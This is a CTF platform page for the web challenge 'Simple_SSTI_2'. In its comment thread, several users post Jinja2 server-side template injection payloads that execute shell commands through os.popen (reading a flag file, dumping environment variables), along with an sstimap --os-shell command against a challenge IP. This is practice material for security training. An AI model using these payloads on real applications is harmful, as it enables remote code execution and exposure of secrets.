Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16440
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
tjq123 攻破了该题 5小时前
xuexing 攻破了该题 15小时前
ylyys2026 攻破了该题 1天前
Gcynbl 攻破了该题 1天前
花间琉璃 攻破了该题 3天前
loonglone 攻破了该题 3天前
hyj11125 攻破了该题 4天前
时倾77 攻破了该题 5天前
lee8ly 攻破了该题 5天前
lizhibin 攻破了该题 5天前
SamJij 攻破了该题 6天前
Sonetto 攻破了该题 6天前
CD123456 攻破了该题 6天前
3121834271 攻破了该题 7天前
银海狼鲨 攻破了该题 7天前
林蔓露 攻破了该题 8天前
路痴通 攻破了该题 9天前
沧颜 攻破了该题 10天前
lanza2451150 攻破了该题 10天前
评论
r1ng_13 13天前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 3月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 6月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 9月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 11月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的